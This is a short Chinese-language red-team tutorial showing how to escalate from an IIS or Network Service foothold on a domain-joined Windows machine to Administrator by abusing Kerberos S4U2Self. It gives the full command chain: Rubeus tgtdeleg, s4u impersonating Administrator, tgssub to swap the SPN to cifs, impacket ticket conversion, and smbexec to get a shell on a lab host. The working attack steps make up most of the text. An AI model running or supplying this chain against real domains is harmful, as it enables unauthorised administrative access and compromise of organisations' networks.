一、利用場景

當獲取域內機器許可權，許可權為iis、Network Service等許可權，就可以利用S4u2Self進行許可權提升，儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”，但任何具有 SPN 的主體都可以呼叫 S4U2self去獲取針對自身的高許可權票據。

二、環境演示

使用Rubeus.exe tgtdeleg /nowrap獲取當前機器賬戶的可用的TGT

然後利用上一步驟獲取到的tgt，呼叫S4U2self來為使用者 Administrator請求票證

Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /ticket:base64

檢視服務名可以看到服務名為機器賬戶，沒有頒發有效的spn

rubeus.exe describe /ticker:base64

SPN 不是票據中受保護的一部分，可以簡單地更改它Rubeus 提供了一個命令tgssub來執行此操作

Rubeus.exe tgssub /altservice:cifs/iis.redteam.com /ticket:base64

將獲取到的Base64EncodedTicket，進行base64解碼 cat base64.kirbi | base64 -d >ticket.kirbi

使用impacket,將它轉換為linux下可用的票據：python ticketconverter.py ticket.kirbi ticket.ccache

匯入：export KRB5CCNAME=ticket.ccache

python3 smbexec.py -no-pass -k -debug iis.redteam.com

、

參考連結:

https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/